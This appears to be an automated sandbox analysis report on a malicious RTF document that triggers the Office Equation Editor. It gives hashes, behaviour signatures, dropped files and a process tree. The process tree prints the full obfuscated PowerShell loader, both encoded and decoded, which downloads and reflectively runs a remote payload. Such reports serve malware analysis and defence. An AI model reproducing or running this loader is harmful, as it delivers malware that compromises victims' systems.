Analysis

  • max time kernel
    93s
  • max time network
    98s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    30-10-2024 02:06

General

  • Target

    15723c9ed5323a6dc5b7a407c37000456bff531f06bd9e7732278eb518445547.rtf

  • Size

    114KB

  • MD5

    6fe3c24853e9de94688a2311999ba946

  • SHA1

    c4383b6caefcb3050ee009394ed1ae07c4f8fd6e

  • SHA256

    15723c9ed5323a6dc5b7a407c37000456bff531f06bd9e7732278eb518445547

  • SHA512

    a1b12f0e1a44d7743d6159f71ab116c8b9e8499cb2d52bc8d1ae3e9f6bc91c3f16788c9be5526052f6bb23b65ceb730a9a46fa2ccd07de05dc30d51f7e9e81a3

  • SSDEEP

    768:u+e7d8wnZX6sQ1j3ArcSGCTl4JkwHKTZ/rR7APQ8c:J/wnZ9Q1UrJWHaFAPQ3

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\15723c9ed5323a6dc5b7a407c37000456bff531f06bd9e7732278eb518445547.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2804
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2184
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptiontogetbetterthings.vBs"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2716
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVuVjpjb21zUEVjWzQsMjYsMjVdLUpPSU4nJykgKCgnTlY1aW1hZ2VVcmwgPSBuZjAnKydodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBuZjA7TlY1Jysnd2ViQ2xpZW50ID0gTmV3LU8nKydiamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtOVjVpbWFnZUJ5JysndGVzJysnID0gTlY1d2ViQ2xpZW50LkRvd24nKydsb2FkRGF0YShOVjVpbWFnZVVybCk7TlY1aW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoTlY1aScrJ21hZ2VCeXRlcyk7TlY1c3RhcnRGbCcrJ2FnID0gbmYwPDxCQVNFNjRfU1RBUlQ+Pm4nKydmMDtOVjVlbmRGbGFnID0gbmYwPDxCQVNFNjRfRU5EPj5uZjA7TlY1c3RhcnRJbmQnKydleCA9IE5WNWltYWdlVGV4dC5JbmRleE9mKE5WNXN0YXJ0RmwnKydhZyk7TlY1ZW5kSW5kZXggPSBOVjVpbWFnZVRleHQuJysnSW5kZScrJ3hPZihOVjUnKydlbmRGbGFnKTtOVjVzdGFyJysndEluZGV4IC1nZSAwIC1hbmQgTlY1ZW5kSW5kZXggLWd0IE5WNXN0YXJ0SW5kZXg7TlY1Jysnc3RhcicrJ3RJbmRleCArPSBOVjVzdGFydEZsYWcuTGVuZ3RoO05WNWJhc2U2NExlbmd0aCA9IE5WNWVuZEluZGV4IC0gTlY1c3RhcnRJbicrJ2RleCcrJztOVjViYXNlNjRDb21tYW5kID0gTlY1aW1hZ2VUZXh0LlN1YnN0cmknKyduZyhOVjVzdGFydEluZGV4LCBOVjViYXNlNjRMZW5ndGgpO05WNWJhJysnc2U2NFJldmVyc2VkID0gLWpvaW4gKE5WNWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBqMW0gRm9yRWFjaC1PYmplY3QgeyBOVjVfIH0pJysnWy0xLicrJy4tKE5WNWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07TlY1Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFMnKyd0cmluZyhOVjViYXNlNjRSZXZlcnNlZCk7TlY1bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmwnKydlY3Rpb24uQXNzJysnZW1ibHknKyddOicrJzpMb2FkKE5WNWNvbW1hbmRCeXRlcyk7TlY1dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChuZjBWQUluZjApO05WNScrJ3ZhaU1ldGhvZC5JbnYnKydva2UoTlY1bnVsbCwgQCcrJyhuZjB0eHQuREZGVEdGUlIvMDA1LzM5JysnMS42Ni4wNjEuNzEyLy86cHR0aG5mMCwgbmYwZGVzYXRpdmFkb25mMCwgbmYwZGVzYXRpdmFkb25mMCwgJysnbmYwZGVzYXRpdmFkJysnb25mMCwgbmYwQ2FzUG9sbmYwLCBuZjBkZXNhdGl2YWRvbmYwLCBuZjBkZXNhdGl2YWRvbmYwLG5mMGRlc2F0aXZhZG9uZjAsbmYwZGVzYXRpdmFkb25mMCxuZjBkZXNhdGl2YWRvJysnbmYwLG5mMGRlc2F0aXZhZG9uZjAsbmYwZGVzYXRpdmFkb25mMCxuZjAxbmYwLG5mMGRlc2F0aXZhZG8nKyduZjApKTsnKS5yZVBMYWNlKCdOVjUnLFtzdHJpTkddW0NIQVJdMzYpLnJlUExhY2UoJ2oxbScsW3N0cmlOR11bQ0hBUl0xMjQpLnJlUExhY2UoKFtDSEFSXTExMCtbQ0hBUl0xMDIrW0NIQVJdNDgpLFtzdHJpTkddW0NIQVJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1892
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $enV:comsPEc[4,26,25]-JOIN'') (('NV5imageUrl = nf0'+'https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur nf0;NV5'+'webClient = New-O'+'bject System.Net.WebClient;NV5imageBy'+'tes'+' = NV5webClient.Down'+'loadData(NV5imageUrl);NV5imageText = [Sy'+'stem.Text.Encodin'+'g]::UTF8.GetString(NV5i'+'mageBytes);NV5startFl'+'ag = nf0<<BASE64_START>>n'+'f0;NV5endFlag = nf0<<BASE64_END>>nf0;NV5startInd'+'ex = NV5imageText.IndexOf(NV5startFl'+'ag);NV5endIndex = NV5imageText.'+'Inde'+'xOf(NV5'+'endFlag);NV5star'+'tIndex -ge 0 -and NV5endIndex -gt NV5startIndex;NV5'+'star'+'tIndex += NV5startFlag.Length;NV5base64Length = NV5endIndex - NV5startIn'+'dex'+';NV5base64Command = NV5imageText.Substri'+'ng(NV5startIndex, NV5base64Length);NV5ba'+'se64Reversed = -join (NV5base64Command.ToCharArray() j1m ForEach-Object { NV5_ })'+'[-1.'+'.-(NV5base64Command.Length)];NV5commandBytes = [System.Convert]::FromBase64S'+'tring(NV5base64Reversed);NV5loadedAssembly = [System.Refl'+'ection.Ass'+'embly'+']:'+':Load(NV5commandBytes);NV5vaiMethod = [dnlib.IO.Home].GetMethod(nf0VAInf0);NV5'+'vaiMethod.Inv'+'oke(NV5null, @'+'(nf0txt.DFFTGFRR/005/39'+'1.66.061.712//:ptthnf0, nf0desativadonf0, nf0desativadonf0, '+'nf0desativad'+'onf0, nf0CasPolnf0, nf0desativadonf0, nf0desativadonf0,nf0desativadonf0,nf0desativadonf0,nf0desativado'+'nf0,nf0desativadonf0,nf0desativadonf0,nf01nf0,nf0desativado'+'nf0));').rePLace('NV5',[striNG][CHAR]36).rePLace('j1m',[striNG][CHAR]124).rePLace(([CHAR]110+[CHAR]102+[CHAR]48),[striNG][CHAR]39) )"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2208

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      9a07962706042fabb819d4273e955333

      SHA1

      5eeb0ae02ff43fc4e43aef5e964b60a279898b42

      SHA256

      54ef4478b054001994d143584dc1d70c90cb3a4d00d243c839ccedb8a98410f0

      SHA512

      f82607485f21c3f0128775f880f4ad620d6b5c015f2677a99a98584ccdaefabaac2679559252c702c58c930ed27a043fa8981bbfdb9eb7ef862264ec46429ccb

    • C:\Users\Admin\AppData\Roaming\seethebestoptiontogetbetterthings.vBs

      Filesize

      137KB

      MD5

      b449b07c0e73637082cf0ce69ed3de96

      SHA1

      c034c97173223611719127c25f416d20f80a8227

      SHA256

      667c141e33d78452d648708f5d618fcc1ca4ddee2c8e85a445e612004ce39b9d

      SHA512

      0036936f7786b2f6102dfc99bd37866cb48def0849c638de2fc0b02d0b3020c225941395881b44cbe24422569e51f9f864505f6a04fc18734327d4babb2c5014

    • memory/2804-0-0x000000002F021000-0x000000002F022000-memory.dmp

      Filesize

      4KB

    • memory/2804-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2804-2-0x0000000070B3D000-0x0000000070B48000-memory.dmp

      Filesize

      44KB

    • memory/2804-19-0x0000000070B3D000-0x0000000070B48000-memory.dmp

      Filesize

      44KB